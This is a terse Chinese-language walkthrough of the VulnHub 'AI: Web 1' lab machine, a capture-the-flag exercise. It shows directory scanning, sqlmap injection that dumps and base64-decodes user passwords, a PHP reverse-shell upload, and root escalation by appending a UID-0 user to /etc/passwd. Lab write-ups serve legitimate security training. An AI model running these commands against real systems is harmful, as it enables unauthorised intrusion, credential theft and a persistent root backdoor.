下載鏈接:
https://www.vulnhub.com/entry/ai-web-1,353/
主機發現掃描:
主機端口掃描
http://10.10.202.158/
目錄掃描:
╰─ sudo python3 dirsearch.py -u http://10.10.202.158 -e .php
[17:11:29] 200 - 141B - /index.html
[17:11:37] 200 - 82B - /robots.txt
分別進行目錄探測:
╰─ sudo python3 dirsearch.py -u http://10.10.202.158/m3diNf0/ -e .php
[17:12:31] 200 - 84KB - /m3diNf0/info.php
╰─ sudo python3 dirsearch.py -u http://10.10.202.158/se3reTdir777/ -e .php
[17:14:54] 200 - 1KB - /se3reTdir777/index.php
[17:14:54] 200 - 1KB - /se3reTdir777/index.php/login/
[17:15:09] 301 - 250B - /se3reTdir777/uploads -> http://10.10.202.158/se3reTdir777/uploads/
SQL注入攻擊
╰─ sqlmap -r ai.txt --dbs --batch
╰─ sqlmap -r ai.txt --dbs --batch --dbs -D aiweb1 -T systemUser -C id,username,password --dump
base64 解密分別為:
t00r RmFrZVVzZXJQYXNzdzByZA== ----> FakeUserPassw0rd
aiweb1pwn TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== --> MyEvilPass_f908sdaf9_sadfasf0sa
u3er TjB0VGhpczBuZUFsczA= ---> N0tThis0neAls0
再次爆破未發現可登陸的后台地址,嘗試下sqlmap 的os-shell
╰─ sqlmap -r ai.txt --dbs --dbs --os-shell
應該是沒有寫入權限,我們嘗試下upload目錄
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
通過這個地址上傳shell:
http://10.10.202.158:80/se3reTdir777/uploads/tmpuvuka.php 長傳php-reverse.php
接下來進行提權操作
LinEnum.sh
╰─ openssl passwd -1 -salt hack403 pass123
$1$hack403$bsTXjmsCRF5fUFoYkS1io/
echo 'hack403:$1$hack403$bsTXjmsCRF5fUFoYkS1io/:0:0::/root:/bin/bash' >>/etc/passwd
完!